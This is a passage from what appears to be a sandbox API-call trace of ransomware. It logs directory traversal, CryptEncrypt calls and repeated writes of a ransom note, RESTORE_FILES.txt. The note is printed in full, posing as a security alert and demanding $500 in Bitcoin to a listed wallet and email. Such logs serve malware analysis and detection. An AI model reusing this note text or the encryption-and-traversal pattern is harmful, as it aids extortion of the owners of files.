Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.054] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0095.054] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.054] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.054] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.054] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.054] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.054] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\..") returned 76 [0095.054] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.054] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.054] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.055] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.055] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.055] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.055] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.055] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt") returned 91 [0095.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.055] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.055] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.056] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.056] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0095.056] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.056] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0095.057] CloseHandle (hObject=0x150) returned 1 [0095.057] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0095.057] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0095.057] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt") returned 86 [0095.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.057] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.057] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0095.058] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.058] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.058] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.058] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0095.058] CloseHandle (hObject=0x14c) returned 1 [0095.059] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0095.059] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0095.060] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt") returned 83 [0095.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0095.060] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.060] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0095.061] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.061] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0095.061] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.061] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0095.061] CloseHandle (hObject=0xd8) returned 1 [0095.061] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0095.061] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0095.061] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0095.062] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0095.062] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt") returned 64 [0095.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.063] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.063] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0095.064] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.064] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0095.064] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.064] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0095.064] CloseHandle (hObject=0xd4) returned 1 [0095.064] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.064] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.064] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\RESTORE_FILES.txt") returned 54 [0095.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.065] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.065] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.066] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.066] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.066] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.066] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0095.066] CloseHandle (hObject=0xb4) returned 1 [0095.067] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.067] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.067] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\RESTORE_FILES.txt") returned 46 [0095.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.067] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.068] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.068] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.068] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.068] lstrlenA 